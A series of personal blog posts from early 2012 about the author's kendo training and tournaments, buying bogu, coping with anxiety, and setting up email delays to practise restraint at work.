Last week I had an excuse not to attend training in the form of my Standby Duty for $CLIENT. This week I was happy to have Peter-sempai come along, so he could be my proverbial savior if things went wrong again. But unfortunately Peter had to call off because of work, so now I am left to face my anxieties.

I do not want my anxieties to stop me from practicing kendo in Amstelveen. But I would lie if I said I wasn't a bit nervous about going tonight. I'm alone, with no alternative driver to take me home.

As I said: I don't want my anxiety to interfere with my training! I'm going tonight, come what may! I'll just have to be smart about it! If I feel that I've overexerted myself, I will stop for the night. And as always I am prepared for problems! I have enough fluids with me, I have dextrose and a snack with me, and I always carry a bag for hyperventilation. I'm just as prepared as I could ever be! Nothing to stop me!

Thus ends the pep talk. :)

EDIT:

I went. It went fine. I was a bit tired at the end, but some dextrose helped out. I trained with the beginners' group and served as motodachi for harai-kote practice. Gave me a good chance to practice my posture and kamae. Roelof-sensei remarked that I was way too tense. He also showed me the proper technique for receiving blows in kirikaeshi.


kilala.nl tags: , , ,

View or add comments (curr. 3)

My first kendo demonstration

2012-03-31 12:25:00

Today's kendo class was cancelled, because the school hosting our dojo would be open for prospective students. The Nautilus College in Almere is a school specialized in educating children with a background in autism and thus their "open days" are a special thing. Instead of our usual practice, our dojo was asked to provide a small demonstration for parents and students. 

While I was packing my things in the car, Marli warned me: "Don't meet anyone cute, you hear? Last time you gave a demo you came home with a wife!" ( ^_^) Of course, that -is- how Marli and I met almost twelve years ago: an archery demo in Wijk Bij Duurstede. Wow! Twelve years!

Our demo was well received and I quite enjoyed doing it. I actually didn't pay any mind to the audience, focusing on our kendo like I should. It wasn't any surprise that Ton-sensei partnered me with Martijn. After our demo I gifted one of the Renshinjuku shirts I'd designed to Ton-sensei, as a small thank you for all of his lessons. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Learning from my mistakes

2012-03-30 11:13:00

The past month I've been paying more attention to my methods of communicating and of working, all under the motto of enryo: "restraint". Overall I see improvement, but with the help of colleagues I've also recognized a number of slipups. 

A while back I stated a number of targets for myself, after a big kerfuffle at the office. Here's how things have gone so far.

This is by far the easiest target. I've simply refrained from contacting R or any of his colleagues in any way or form. Any work that needs to be done together with them was deferred to my colleagues. However, there was also a bit of misunderstanding on my part: this target did not only cover R and his team, but also the other team. So, no less than two weeks after the troubles I made the mistake of contacting E from the other team, which blew up in my face. So the target's been extended to: "I will refrain from contacting R, E and their teams in any way".

I almost stuck my foot in a hornets' nest yesterday! 

Almost a year ago I helped out one of the big projects going down at $CLIENT to achieve their über-important deadline. It involved some changes to one of our BoKS environments and also involved some programming to change the infrastructure. At the time I was in the lead, but I frequently discussed the matter with R to make sure things would work properly. The project met its deadline "and there was much rejoicing".

Now, there's a follow-up to the project which requires more programming to change the infrastructure. The project team defaulted to contacting me about it, as I'd been in the lead last time. Falling back into my old project-mode I quickly joined up and started discussing the matter. It was only when one of my colleagues remarked that R was also working on the programming that I remembered that this programming officially falls under R's team's responsibilities. And thus I came this -><- close to breaking this target! So many thanks to my colleague Rishi for jogging my memory! ( ^_^)

This has gone well! We've had a few problems and incidents that require cross-department cooperation in order to troubleshoot and solve the issue. In each of these cases I've drawn up complete reports of my findings and methods, which I then transferred to one of my team members. I urged them to go over my work, to make sure I didn't make any mistakes and to add to it, so they could then continue working on the project with R's and E's teams. 

One of the biggest things I did to achieve this goal was to build a filter into my Outlook mailbox: all of my email will be delayed by an hour, for re-reading and adjustment, to prevent foot-in-mouth situations. That is, unless I go out of my way to tick a certain box that says "send this email right now" (which in practice means: in three minutes).

This has gone reasonably well, although I find that it's too easy to make the six clicks required for the "send immediately" option. I need to use this frequently when I'm on a specific shift, but I've also found myself using it with normal emails. That's not good and in one case it led to an ill-worded email making it to a customer. I discussed the matter with my colleague Tommy, who pointed out a few things to remind me of my own goals: it's better to phone than to email, and never send emails when you're agitated.

And that's the key in this case: it happened when a customer had crossed a number of security guidelines in a rather blatant manner, which I felt needed to be dealt with quickly. My bad: I should've sat on my email a bit, reread it and then phoned the customer to call a meeting. Live and learn.

I've not conferred with my colleagues often enough in this regard. Sure I've asked them a few times, when I was in doubt... but I'm not in doubt often enough! (;^_^)


kilala.nl tags: , ,

View or add comments (curr. 0)

An epiphany during home training

2012-03-27 21:35:00

This week Martijn and I will be training at home a few times, 'cause we'll be missing the Amstelveen and Almere training. Tonight I grasped two important things, thanks to him.


kilala.nl tags: , ,

View or add comments (curr. 2)

"Survival of the fittest", he said...

2012-03-21 20:27:00

The day before yesterday, Heeren-sensei taunted me on Facebook, warning that class was going to be "survival of the fittest". I had no idea what that meant, but was sure it was going to be hard work. Well, he didn't lie! Because last night's class was really something else!

After warming up we were told to form pairs with someone of comparable height and fitness. Naturally, Martijn and I teamed up: we're just as tall and out-of-shape and we're bonded through our Almere dojo. What followed was 45 minutes of "interval training", as Jouke called it. We would be taking turns in various exercises meant to completely exhaust our arms and shoulders.

I'm really quite hazy about last night's details, so I might've missed a step here or there. I went to bed immediately when coming home, so I didn't even make notes!

As I mentioned, the whole point of this gruelling exercise was to exhaust us up to a point that we couldn't do anything but efficient kendo. With our arms so tired we just have to be relaxed and we have to do proper striking. Jouke repeatedly asked us to memorize the feeling of all of this, so we could try and emulate it later. 

For the last half hour of class we did jigeiko. I faced three people, including mr vd Velde and Raoul-sempai. I'm very sorry to say that I've probably forgotten some of the important points.

Raoul-sempai took his time with me. Instead of full-on geiko, he told me to strike and that he'd let me through if it looked like a good strike. He primarily coached me on my small strikes and fumikomi.

By the end of class and in the shower I was feeling completely drained. In the dressing room I sat there, slumped a bit. While I was having a chat with Heeren-sensei I got faint and had a panic attack. Luckily I managed to nip that in the bud by using breathing exercises. Thank $DEITY Martijn was with me, so he could drive us both home. 


kilala.nl tags: , , ,

View or add comments (curr. 2)

What a great class today!

2012-03-17 16:55:00

Kendo was awesome today :) There was a turnout of roughly eighteen people. 

As usual we started off with kata practice. Today I had the pleasure of training with Bobby. I say pleasure, because in kata we make a good connection. What we lack in form, we make up in the mental aspect. We lock eyes and properly go through the "dialogue" that kata are. 

Footwork training got expanded again and I'm glad we did this! Four laps of suri-ashi, two laps of double men-uchi, one lap of suri-ashi with the shinai stuck through our legs to keep proper distance. Then two laps of repeated men-uchi and one lap of continuous men-uchi. In the final three rounds, my suri-ashi went out the window again. :(

Kris tells me that I switch to ayumi-ashi (i.e. "walking"), which messes up my rhythm completely. The stupid thing: I don't even notice the switch! In my head I'm still doing the sliding footwork, and I don't even notice that I'm not sliding anymore. So weird! The fact that I'm putting my left foot in front confuses the rest of my body and messes up the timing of my strikes. I'm glad that Kris pointed this out, so now I can pay more attention to it. 

Like last time we then switched to kihon practice, with all beginners on one side and the kendoka in bogu on the other. As motodachi we kept receiving the strikes that the bogu-less folks threw at us. Big men strikes, small men strikes, big kote-men and small kote-men. Twelve rounds in total I believe. We then split the group up, where the beginners went with Ton and we went with Kris for waza practice. 

Small men strikes, then men-hiki-men, then men-hiki-men-hiki-kote, then men-hiki-kote-hiki-do. With the last one I really started getting confused on the timing and the steps; for every do strike my distance was too large to even hit. I think I realized why: when going back from tai-atari I kept doing step-back, fumikomi-hiki-kote, fumikomi-hiki-do. I shouldn't do the step-back! Even worse: the step-back was a weird bounce :(

Finally we did oji-waza, where motodachi strikes a small men and kakarite can do anything he wants. In my practice rounds, in most cases I failed to land a retaliating strike; I only deflected or evaded :(

To close our private practice we did jigeiko, where I went up against Martijn. That's been a while! :) The others remarked that we completely lacked any tension and conviction. In most cases we struck and immediately sunk into tai-atari, instead of doing zanshin (like Kris remarked last week!). Then we slunk backwards and tried weak slaps. All in all we were messy and we've got a long way to go. I don't mind, I'm looking forward to learning over the next few years! :)

Class ended with uchikomi geiko, where Kris demanded that everyone do their kiai continuously. No stops, no short kiai, just continuous. After my first round he made me go back, because I kept stopping to breathe after each hit. So I got to do three rounds! /o/

Great stuff! I was hyped after class! I even think I'm improving in my stance a little bit, because I don't have those killer muscle aches in my neck and arms anymore ^_^


kilala.nl tags: , ,

View or add comments (curr. 0)

The long road ahead: ken-tai-ichi

2012-03-14 21:38:00

One thing I forgot to mention in my last kendo post, was something Kris mentioned during debriefing: he sees many of us blocking all the time, without going on the offense. To paraphrase: "Sure, blocking blows is fine and it's easier than you'd think... but it sure makes for damn boring kendo!"

Today I was reading through Kendo World 5.2 (hooray for Kindle on iOS!) and ran into an article which went into what Kris described a bit deeper. Quoting from 'The greater meaning of kendo' (part 12), by prof. Oya Minoru as translated by Alex Bennett:

"'Ken-tai-itchi' refers to the inseparable combination of attack and defense. Ken refers to offense and tai to defense. The concept is also called 'ken-chu-tai' (offense exists within defense) and 'tai-chu-ken' (defense exists within offense). […] Whether blocking, deflecting, parrying, or striking down, you must also follow with a cut or thrust. The attacking sword is simultaneously one that protects. Defense is for the purpose of attack, and attack also forms defense."

Right now I know I should be doing it this way, but at this moment simple defense is ingrained in my instincts. But with a lot of training I sincerely hope to reach a point where ken-tai-ichi becomes natural.


kilala.nl tags: , ,

View or add comments (curr. 2)

Learning points from yesterday's class

2012-03-11 19:29:00

Yesterday's class was as usual: kata, warmup, ashi-sabaki, kihon, waza, geiko. Two things were out of the ordinary: the footwork training included 2x2 lengths of continuous men-uchi and the kihon practice pitted bogu-less kendoka against those in bogu, who were constantly serving as motodachi.

Serving as motodachi I was happy to see that I've built enough experience to at least notice basic problems in my opponents. So those were aspects that I tried to really help them out with: point it out and encourage them to work on it. So, that's them. How about me? Plenty of stuff!

In the debriefing Kris also forwarded a message from the jurors at the NK kyu/teams. It echoed a lot of the things that I've written about before: our grasp of etiquette and procedure sucks and our kendo really isn't up to snuff. Kris and Hillen indicated that they could be stricter with us as a group, but that won't cut it; it needs to go both ways! We all need to be involved and have a stake in our team.

So, after all of that Sander and I made a pact. From here on we'll be the stern voice in our ranks, despite the fact that we're only ranked in the middle of our group. Whenever people are chatting or slacking, we'll remind them to stay attentive.

EDIT:

With regards to pointing out perceived issues in other people's kendo: as Marli has warned me, I probably shouldn't. I'm nowhere near the position to do so and thus it falls under the same category as before: just shut up. Sensei and fukushou will undoubtedly mention the same things, so I should just butt out. As the Madison Kendo etiquette guide says: "Never instruct others unless you have been told to do so by the lead instructor. It is important to let less experienced participants learn by observation and improve their reaction speed. They will learn faster by doing it than by having someone tell them how to do it."

I just realized that my "helping" others in this case was becoming a matter of pride. That -really- has no place in kendo. "Shut up" is the motto from now on.


kilala.nl tags: , ,

View or add comments (curr. 2)

A humbling experience in Amstelveen

2012-03-06 22:31:00

As awesome as last week's training went, so humbling was today's experience. Not even into the fifth round of kihon practice I had to bow out. I simply couldn't lift my shinai anymore and was out of breath. I tried to push myself during the fourth round, which is why I made it through the fifth one, but after that I was gone :(

The first two rounds were kirikaeshi, which went alright. In the first one my partner unexpectedly had strikes like a mallet, so my men took some rocking and shaking! Rounds three through five were men-strikes, without end: A does three, B does three, lather-rinse-repeat. That's when I bowed out. After gathering my gear and committing my first faux pas of the evening (sitting down while others practice), Roelof-sensei quickly pulled me into the beginners' group. 

With the beginners' group we practiced men-strikes and dou-strikes. First starting with the left foot and passing left. Then starting in normal kamae, but still passing left. And finally the dou strike as we're used to. 

There were plenty of things that were just plain wrong.

I am -very- glad that I joined the Amstelveen group for the Tuesday night! Not only is it highly educational, but it helps me find more and more flaws in my kendo. And of course it's just great exercise. With regards to my stamina, Marli rightly points out that "well, maybe you should just start lifting those damn weights and run more!". When she's right, she's right ^_^


kilala.nl tags: , ,

View or add comments (curr. 6)

More analysis of my kendo technique

2012-03-01 23:00:00

KendoFeb2012.m4v

Last year I saw the benefit of filming my kendo practice, to find weak points in my technique. I learned a lot from that. Tuesday, my first lesson in Amstelveen, Peter-sempai came along and filmed a little of my warming-up. I'm very grateful that he did this, because the clip above serves as a reminder of things I've been doing wrong for quite some time. 

In the second part of the clip (kirikaeshi) I'm the middle one, with his back to the camera.

The clips show plenty of stuff I like as well. The movement of my left fist isn't bad and I do believe my fumikomi is improving a little :)


kilala.nl tags: , ,

View or add comments (curr. 2)

Forcing restraint in email: message delays and reminders

2012-03-01 18:11:00

A warning message in your email template: be careful what you write

Last week I made a few resolutions for myself regarding communicating at work. These resolutions were reaffirmed today, in a meeting with my manager and are now stated thusly:

In order to help myself stick to these resolutions I've made a few configuration changes to my Outlook email client. These are by no means guarantees that I will improve, but they serve as stern reminders that my mindset needs changing. 

Every email I start writing, whether it's a reply or a new message, is filled with a big warning template asking me "Are you really using email? Wouldn't it be better to phone?". It also reminds me to "Watch your phrasing! Are you CCing people?". I couldn't find a way in Outlook to set up a template or standard email to do this, so I've adjusted my email signature to serve the purpose. 

I have also set up two filtering rules to delay my outgoing messages. With many thanks to How-to Geek's 'Preventing OhNo! after sending emails'.

  1. Apply rule to mail I send: assigned to category "CHECKED", delay delivery for 2 minutes and stop processing rules.
  2. Apply rule to mail I send: assign mail to category "NEED TO CHECK" and delay delivery for 60 minutes, except if mail is assigned to category "CHECKED", or if message is invitation or update.

 

The second rule determines that every single email I send will be delayed for an hour. This will prevent many foot-in-mouth situations and will also force me to review my message. Each of these messages gets classified as "NEED TO CHECK", unless I specifically go out of my way to set the message to "CHECKED". All messages marked as "CHECKED" will be delayed for only two minutes, after which they'll go on their way to the addressee.

I will also add an hourly reminder to my agenda to prompt myself to review all pending emails.

My manager indicated upfront that these changes will drastically lower my throughput at the office. Part of the reason why I'm so damn fast with our ticket queue is my over-reliance on email: fix an issue, inform the client through email, BOOM! Next ticket! I have to admit that I felt a few pangs of OCD at this realization, because I always worry about our ticket queue. We're already behind on our work, so if I'm going to get slower we'll only fall behind further. Luckily my manager accepts this, as she feels that fixing my communication issues is more important than our current workload. Wow!

I'm quite hopeful that these measures will aid me in improving my communications at work. Right now I still need external stimuli to practice enryo.

EDIT:

Sadly there is no way of implementing the second set of precautions in Apple's Mail.app. The software does not support rules on outgoing email without the support of Mail ActOn and even then it only allows such things as filing the sent message. It will not allow delays or forcing messages to be saved as drafts. 

Because of this I tried to give Thunderbird a shot, but I still hate that piece of software. I can't help it. Alternatively I think Sparrow looks great, but I don't think it has the options I'm looking for. Even Entourage 2008 doesn't appear to support the kind of rules I'm using in Outlook 2003 at the office ;_; 

In the end I implemented my 'helpers' in Mail.app by:

  1. Adding a default signature, just like the one described above. 
  2. Remapping shift-command-d (Send message) to save the message as a draft.
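
For what it's worth, the remapping itself goes through System Preferences > Keyboard > Keyboard Shortcuts > Application Shortcuts, but as far as I know the same mapping can also be written from the Terminal. A sketch, assuming the menu item in your version of Mail is literally titled "Save as Draft" (check the File menu and adjust the name if it differs), and restart Mail afterwards:

defaults write com.apple.mail NSUserKeyEquivalents -dict-add "Save as Draft" '@$d'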

kilala.nl tags: , , ,

View or add comments (curr. 2)

A change to my training schedule

2012-02-28 22:36:00

From this week onward I will be training kendo twice a week: Saturday morning at Renshinjuku Almere and Tuesday evening at Renshinjuku Amstelveen. Tonight was my first class in Amstelveen and I'm very grateful to a bunch of people. I'm thankful to Peter-sempai for coming along as moral support. I'll readily admit that I was a bit nervous about going to a completely new group, so it helped to have a friendly face in the first hour. And of course I'm grateful towards Heeren-sensei and everyone in the group for the warm welcome. It felt like I'd been training with them for a while already :)

Most notably, I'm thankful to Marli! She's the one who pulled the trigger on this decision!

After witnessing us at the NK Teams and after hearing some of my thoughts, she basically said that "if you really want to become serious about both kendo and the discipline that comes with it, then you're going to have to train with another group". Me being a stupid-head I originally understood that to mean "leave Almere and go elsewhere", but that's not what she meant. She meant: train more and with other groups. Wow! I'm so lucky that she's actually the one pushing me to go do kendo twice a week :)

Now... Class schedule at Amstelveen is a bit different. Almere usually does kata, warming up, footwork, kihon+waza and geiko. Tonight's schedule was warm up, then an hour of kihon+waza and half an hour of geiko. Heeren-sensei indicated that this does shift around a bit, depending on the crowd that comes in. One particular aspect that I enjoyed was the personal involvement ('hoofdelijke aansprakelijkheid', roughly: personal accountability) during the debriefing. Heeren-sensei asked a few of the kendoka how they had been using the waza that we practiced in their geiko and if they succeeded (and if not, why not). "How often did you do harai waza? Did it work? Why not? When would you best use harai waza?" (the answer turned out to be "when your opponent has become weak in his arms")

Things that were pointed out for improvement:

I'm very happy about the fact that I did pay more attention to my fumikomi! I was consciously trying to make improvements in that! Also, I used my bogu for the first time this evening and I'm very, very happy with it! I still need to break in the kote, but every piece of the kit feels comfortable and suits me perfectly.

A great night! And now I'm off to bed!


kilala.nl tags: , ,

View or add comments (curr. 5)

NK kyu grades: Dutch national championship for kyu-graded individuals

2012-02-20 16:37:00

The day at the Dutch national kendo championships started with the NK for kyu-graded kendoka: those "beginning" players who have not yet graded for first dan (anyone below black belt, to use the karate parallel). Realistically this means pitting folks with 0-4 years of kendo experience against each other. Five players from Renshinjuku Almere had registered and each was placed in a different poule.

Nick and I were on field A, in poules 4 and 5, while Houdaifa, Tiamat and Martijn were in poules 1, 2 and 3. I recall that Houdaifa made it through to the second round, but got bumped out after that. Tiamat, Martijn and I didn't make it through the first round. Nick managed to place third in the whole championship. Good going Nick! /o/

I'll come out and say it right now: my performance was awful, mostly due to my mental state. I went into this completely wrong, forgetting everything I've learned about kendo over the past year. 

It is often said that kendo is a dialogue between two warriors. They speak through their shinai and bodies, thus determining who will strike when the time is right. Simply trying to overpower your opponent will almost never give proper results. And yet, that was exactly what I was trying to do: I was trying to assert my own will over my opponents. In my mind, I had a point to make: "I may be a rookie, but I won't be overpowered by you! Here! Have at you!" And thus I would immediately launch into an ill-advised attack. 

Within fifteen seconds from the starting command I would force myself forward, predictably aiming for kote. Whether there was an actual opening, whether my kamae or maai were right, whether I even had a chance? I didn't take any of that in and I simply attacked. So very, very wrong. 

In both cases I was out within fifteen to twenty seconds, with four nicely placed men-strikes scored against me. In both cases I thanked my opponents for an educational experience, whose lesson I would only figure out later that evening. 


kilala.nl tags: , ,

View or add comments (curr. 0)

NK Teams: Dutch national championships for kendo teams

2012-02-19 22:06:00

First off, I'd like to give special thanks to Kris-fukushou for his guidance during our day at the NK kendo! It was a huge support for us newbies, to have him take some time away from Museido Dojo and to coach us. Thank you Kris! Also a hearty congratulation to Museido for winning third place and to our mother-dojo Renshinjuku Amstelveen for winning first place!

Originally I was going to take part in the NK Teams as part of the Renshinjuku Almere team, but that took a turn. There were six of us and because Jeroen hadn't fought today, I offered him my spot on our team, putting myself in the reserve seat. It's good that I stuck around, because Kris was approached by a member of the jury, asking about Houdaifa's age. Turns out that the age limit for the NK Teams isn't 16, but 18! Which meant that I got switched in for our second competition in our poule. 

I went up against mr Weber of Arnhem's Kendo Kai Higashi. Luckily I lasted longer than my two fights in the NK Kyu. I went down with two men-strikes against me, plus one loss of my shinai which was flicked away when defending against a very strong men-strike. Learning points:

Then, as for our team? I'm sad to say that, honestly, we were not a team. We were six kendoka who train together and who spent the day together. We were the least experienced team and it showed. 

Nothing but good about the fighting prowess of my sempai! I'm greatly impressed with how they all did and I will have plenty to learn from them in the years to come! And our attitude amongst each other is great! We're a positive and friendly group! However, outside of the fighting we weren't very good. We have a lot to learn about order and discipline. 

During the day I was too overwhelmed by the spectacle of it all, but afterwards I'm honestly a bit ashamed. 

Ton-sensei, Hillen-fukushou and Kris-fukushou say it often: training once a week is not enough. By only spending two hours a week together we barely have enough time for basic training and some geiko. Let alone time to learn etiquette and equipment maintenance! If there was a chance to train twice a week with our dojo, I'd jump at the chance! And I'd love to help in any way needed to set it up! Heck, I'm already training several sempai in the maintenance of their gear!

Tomorrow I'll take some time to write about the rest of the day and my participation in the individual NK for kyu-graded kendoka.


kilala.nl tags: , ,

View or add comments (curr. 2)

An awesome outing: NK kendo

2012-02-19 20:15:00

Packing all my gear

Today was an excellent day!

I'd packed all my stuff yesterday, making sure to take along enough food and drinks for myself and one other person. You never know who gets hungry, but forgets to bring food or money. It barely fit into my kendo bag! :D

In the morning I got a bit anxious about my family being home alone, what if something'd happen and Marli couldn't make it to a phone? You know, the general anxiety stuff I live with. I'd taken care of all other possible worries I might have, but this one stuck. So Marli spoiled a surprise she'd prepared! She'd arranged for our good friend Michel to pick up her and our daughter, so they could come and watch too. Awesome! I'm so grateful for Michel's help!

I picked up Tiamat and Kris-sempai at Almere station at the appointed time: 0845. We then made our way to Zwolle, arriving nicely in time. We made some small talk with our class mates and got dressed. Kaijuu also showed up around that time, so that was a nice reassurance for me: one of my best friends would be sticking around all day!

The sports hall at Landstede is awesome! A huge wooden floor, with nice lighting and good seating provided a great arena for our tournament.

Shinai checking occurred at 1035 and both my shinai passed muster. We found out our poule arrangement for the individual tournaments and also ascertained when our dojo would fight in the teams compo. Finally, we were a bit late getting started with the warming up. All the other groups were ahead of us, so we hurried it a bit. I have to say: I always thought our group's kiai during warmup to be nice and loud, but boy do other teams have wonderful kiai! I don't know who they were, but wow! It was like thunder rolling in!

You can read about my participation in the individual matches here.

Once I was out of the kyu grades compo I had lunch and talked with my family. The girls had arrived before I got started and my father also made it in time. So cool! I'm so grateful for such supportive family and friends! I did my best to study Nick and his opponent in Nick's final fight. That was a great fight!

You can read about my participation in the teams matches here.

All through the day our kid's been a champ! She had talked and played with Marli, grandad, Kaijuu, Michel, Christa and with a few kendoka. By the time I was ready for the team matches she'd fallen asleep in Marli's lap, being completely worn out. This is why I decided to pack up and get changed right after the match. I thanked my opponent, did a quick review with my team mates and headed for the dressing room. 

We went home with Kaijuu (Kris and Tiamat hitched a ride with Peter), so Marli could get a tour of his new digs. I was also completely worn out, falling asleep at least once. Odd, how a busy day with only one real fight could wear me out so profoundly.

We then went for dinner at Itoshii. It was bloody brilliant! They charge E24 for five rounds of dinner, each round allowing you three to four small dishes. By round three I'd had my fill of some great food: udon noodles, gyoza, curry rice and plenty of good meats. Kaijuu and Michel also seemed to enjoy their sushi a lot. Really great stuff!

By the end of the evening we also got to meet Kaijuu's girlfriend Natalie. Sweet girl! <3 I'm looking forward to having an actual talk with her, instead of half-sleeping, half-minding our daughter ;)

Image source.


kilala.nl tags: , ,

View or add comments (curr. 0)

A rather unimpressive performance

2012-02-18 15:23:00

some sketches for kata 3 and 4

First off, I'm rather disappointed with my own performance in class today. After only a few rounds of kihon practice my head was spinning and I lost all sense of power in my arms. Like I was completely empty. Fifteen minutes later I was mostly fine again, which to me suggests that I need to do two things: properly dose my power output and build more and more endurance. 

Today's class revolved around shiai practice, that is to say: preparing for tournaments. Tomorrow a team from Renshinjuku Almere will be attending the Dutch national championships. Nick, Jeroen, Houdaifa, Tiamat, Martijn and I will travel to Zwolle to compete in two competitions. Each of us will participate in the individual competition for kyu-grade kendoka and the six of us will also form a team for the NK teams competition. The latter will be quite a challenge as we'll be going up against both kyu and dan-graded kendoka!

As usual, class was started with kata training, which I did with Nick. A great experience, as both Nick and Ton-sensei showed me a few eye openers. Two of these are sketched above; left is correct, right is wrong.

  1. In kata #3, after the opening thrust by uchidachi, shidachi thrusts back. When doing so I used to move my arms in such a way that the bokken would become level, to stab the torso of uchidachi. I was now taught that the bokken should actually remain diagonal in a straight forward movement. The theory behind it being that it would not stab, but cut the torso.
  2. In kata #4, after stepping forward both kendoka strike men, to cross bokken at eye level. Uchidachi moves in hasso-kamae, while shidachi moves in waki-gamae. When making the strike from waki-gamae I used to make a circular arc, while the bokken should actually be lifted straight upwards, after which an arc is made.

When it comes to footwork I stuck to my training goal for 2012 and focused on fumikomi. Part of this was achieved by also focusing on my pelvis. My natural stance (which really is bad posture) gives me a hollowed back and my tush tilts backwards. Today I really focused on keeping my pelvis tilted forwards, which worked miracles for my stance.

I'm really curious about tomorrow! It'll be a long, long day... I'll be away from home from 0830 until 1830. Ouchie.


kilala.nl tags: , ,

View or add comments (curr. 1)

Conquering myself: anxiety and restraint

2012-02-16 07:16:00

enryo

Starting this week, my desk at the office has been rearranged somewhat. All of my gear's been moved to the right, thus providing an uninhibited view of the divider board. This board is now adorned with a piece of A5 paper, bearing the kanji shown left: enryo, 遠慮 (picture source).

Enryo is the Japanese concept of (and word for) restraint. The kanji consists of the words for distant and prudence.

I've chosen this word as my mental goal for this year, next to my physical education goal of fumikomi. Why? Because restraint will help me at work, in kendo, and with my anxieties. At work, because I've repeatedly gotten in trouble for being too hasty. In kendo, because I show way too much of what goes on in my head. In my anxieties, because control over mind and body will aid in preventing and fighting panic attacks.

Here are two excellent articles about the concept of enryo in Japanese culture:

Speaking of my anxiety disorder. I visited my therapist again yesterday and he's quite happy about my progress. He was disappointed that I had not continued with the progressive relaxation exercises, but was glad that I'd replaced them with concepts from kendo and tai chi. From here on I will be setting exposure goals for myself, where I simply go out and expose myself to situations I loathe, of ever-increasing difficulty. We will meet up only once more after this, after which my therapist is confident that I can continue the training on my own.

Finally, just to keep track of stuff: in the middle of the night I had a mild bout of hyperventilation.


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Miyako Kendogu: free and fast shipping

2012-02-14 11:11:00

Shipping status with UPS

A little while ago Marli ordered a beautiful set of bogu for me, from Japan. I was already impressed with Miyako Kendogu's service insofar that they provide both spectacle adjustments and worldwide shipping free of charge. But now I'm even more impressed because this free shipping is actually UPS Worldwide Saver! Meaning that the parcel will arrive in the Netherlands within three working days! Wow!

It makes me giddy to know that I'll probably be wearing my new bogu this weekend! ^_^


kilala.nl tags: , ,

View or add comments (curr. 1)

Kendo kyu exams at Renshinjuku Almere

2012-02-04 14:48:00

Ten months after our dojo's previous exams we held kyu-grade exams today. This time around the group of people was a lot smaller, but things were still just as chaotic as last year. First off I started putting on my bogu, even though we were not supposed to wear it during the exam. Then I had my zekken on, which was supposed to be off. Then I'd forgotten to switch to my kendo glasses. And finally, minutes before my test, I discovered that I was still wearing my wedding ring! Messy =_=

Today we had one person testing for fifth kyu, three for fourth (including myself) and three for third. The exams were as follows:

In general I thought my test didn't go badly and I was feeling more confident than during my first exam. However, there was plenty of stuff that wasn't great. Sensei tells me that I graded for fourth kyu, but that third kyu would require a lot of hard work.

The biggest problems seen in my kendo today were:

Martijn also remarked that, while my kiai sounds good, it's not supported by focus or strong body language.


kilala.nl tags: , ,

View or add comments (curr. 0)

Unseen inspiration: tenugui

2012-02-03 19:50:00

tenugui with skeleton

In kendo, practitioners generally all look the same. With some exceptions, everyone wears a dark blue uniform and a mostly black bogu. Some people have a differently coloured do-dai, like red or blue or hot pink :p But overall one can say there's little to no space for personalization. 

The only part of the whole uniform that expresses the individual is the tenugui: a cotton towel, wrapped around the head. In Japan, tenugui have dozens of uses, from dish rag to headband, to table cloth, to decoration. And us kendoka use it to catch sweat and to keep our helmets clean(er). ^_^

Tenugui come in greatly varying designs. From very simple and plain, to colourful and intricately designed. Many tenugui are 100% meant for decoration and are sold at rather steep prices. There are shops specializing in the sale of these design-conscious towels.

And it's through their tenugui that kendoka get the chance to express a little individualism, character if you will. Many wear cloth with inspiring words or phrases. Others have cloth with their dojo's logo, or tenugui that were gifted at special occasions. Personally I already have quite a few to choose from and there are more on their way.

Each of these has some special meaning to me, serving as inspiration for me. The ones from Niels and Kaijuu are reminders of friendship. The Tigers one is also for fighting spirit. The Sakurajima volcano ones are for slumbering violence. The white rabbit one is because of this :D 

And of course the skeleton ones are as reminders of my loving wife and her never ending support in my kendo! They are named as follows:

With many thanks to JEDict for the help in translating ^_^


kilala.nl tags: , , ,

View or add comments (curr. 3)

Miyako Kendogu: Yoroi-gata 'Tsubasa' (ORDERED!)

2012-01-29 12:21:00

Miyako Kendogu Yoroi-gata Tsubasa set

A few days ago Miyako Kendogu (an international collaboration between Andy Fisher and Tozando Co.) announced their newly introduced "Tsubasa" bogu set. I've never heard anything but good reviews of Miyako supplies and have been considering buying a bogu from them. The only thing that's kept me back is their rather high price point. Where a starter bogu from Kendo24 would set me back roughly 350 euros (and one from Nine Circles roughly 300), the stuff from Miyako usually starts at 500 euros and easily goes above 800. 

The introduction offer for the Tsubasa set is awesome though: 50% off! Meaning that the set would set you back 419 euros, instead of 840. Holy crap! And because international shipping is free, it's a steal! What's even better is that Andy assures me that Miyako adjusts men for kendoka who wear glasses for free. Wow.

That's a good enough offer to make me seriously consider it!

EDIT:

Holy shit! Holy crap! OMG!... Marli just OKed and ordered the set to my measurements!!!! I'm still doubting between panic and sheer overjoyment! *panic* *joy* 


kilala.nl tags: , , ,

View or add comments (curr. 4)

A stern lecture: we need to up our game!

2012-01-29 10:51:00

Yesterday's kendo practice was both great and a letdown at the same time. 

It was absolutely awesome to have so many kendoka turn up! No less than twenty people were present, divided 10:10 between people with and without bogu. And the practice that we did was wonderful, with many techniques I'd never done before! But I was also heavily confronted with my lack of stamina. 

During class I gave up no less than three times ( =_=;)

With the first, my arms just couldn't keep up with the pace. During the second I felt exhausted. During the third I felt like a tube of toothpaste, squeezed completely empty. It's no excuse and it's not a consolation either, but I wasn't the only one. Which led to a rather stern (and deservedly so!) lecture at the end of class. Sensei and fukushou were rather displeased with the lack of endurance shown during class. Especially during something as early and basic as warmup!

It's rather shameful that so many of us have these issues. Can you imagine how awful it'd make the Renshinjuku Almere dojo look during seminars or national events, if our students show fatigue so quickly?! It's come to the point that we're going to use bootcamp-style warming up: if anyone drops out during an exercise, the whole group will need to redo the whole exercise. Kris-fukushou repeatedly referred to his speech from last week: our whole team needs to work towards a higher level! We shouldn't be happy puttering about at our current entry-level kendo!

Now, I'm not going to let this put a damper on my mood or my perseverance. On the contrary! Martijn and I have started running practice and Sander and I have decided that we need to push each other. We need to friggin' keep going! FIGHT! For such a philosophical martial art, kendo really is damn demanding on your physique.

With that aside... Waza practice had us doing all manner of stuff that's new and advanced to me! Hiki-men, hiki-men-kote, hiki-men-kote-do, all of which taught me that my initial steps/stomps backwards are too large. After my first strike I'm already out of range, so I can't make any follow-ups. Then followed strings of kote, kote-men, kote-men-do and hiki-men back and forth across the gym. Jigeiko was a big letdown for me. I took on Nick, followed by Martijn and that was that. I couldn't go on anymore.

